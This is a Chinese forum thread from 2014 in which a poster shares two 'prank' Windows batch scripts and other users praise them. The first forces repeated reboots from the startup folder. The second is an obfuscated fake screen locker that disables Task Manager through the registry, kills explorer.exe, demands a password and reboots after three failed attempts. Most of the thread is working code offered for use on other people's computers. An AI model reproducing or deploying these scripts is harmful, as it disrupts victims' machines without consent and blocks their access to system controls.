我也来一个...
整人批处理吧
全部回复
仅看楼主
level 9
刹那丁丁 楼主
在网上看到的,放在开机启动项里,会让电脑重启5次。
破解办法是,运行前,在C盘建立5个文本文档,1.txt 2.txt 3.txt 4.txt 5.txt
下面放代码
@echo off
for /l %%i in (1,1,5) do (
if not exist c:\%%i.txt (echo.>c:\%%i.txt&goto err)
)
exit
:err
shutdown /r /t 0
2014年11月10日 13点11分 1
level 12
谢谢分享,给你加精。
2014年11月10日 13点11分 2
这个就不用了吧 又不是我写的
2014年11月10日 13点11分
回复 刹那丁丁 :分享也是好的。
2014年11月10日 13点11分
level 9
刹那丁丁 楼主
再来一个,之前在批处理吧发过,把重启代码去掉可用于锁屏,不过不能关掉BAT窗口,否则就真的只能重启了,破解密码是explorer
@echo off&setlocal enabledelayedexpansion
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system /v DisableTaskMgr /t reg_dword /d 1 /f >nul
set c=&set d=&
set k=3
set a=toarsekr&set b=ekxiplll
for /l %%i in (0,2,6) do (
set c=!c!!a:~%%i,1!
set d=!d!!b:~%%i,1!
)
set e=!c!&set f=!d!
for /l %%i in (1,2,7) do (
set e=!e!!b:~%%i,1!
set f=!f!!a:~%%i,1!
)
!e! /f /im !c!mgr.exe 2>nul>nul
:B
!c!list |find /i "!f!.exe">nul
if %errorlevel%==0 (!e! /f /im !f!.exe>nul&goto C) else (goto B)
:C
if !k!==0 (shutdown /r /t 0)
color b
echo 你还有!k!次机会解锁,超过之后电脑将重启。
set /p sz=输入密码:
set /a k+=-1
if not %sz%==%f% (cls&echo 密码错误&goto C)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system /v DisableTaskMgr /t reg_dword /d 0 /f >nul
!c!list |find /i "!f!.exe"
if not %errorlevel%==0 start !f!.exe
2014年11月10日 13点11分 3
level 12
赞!
2014年11月11日 08点11分 4
1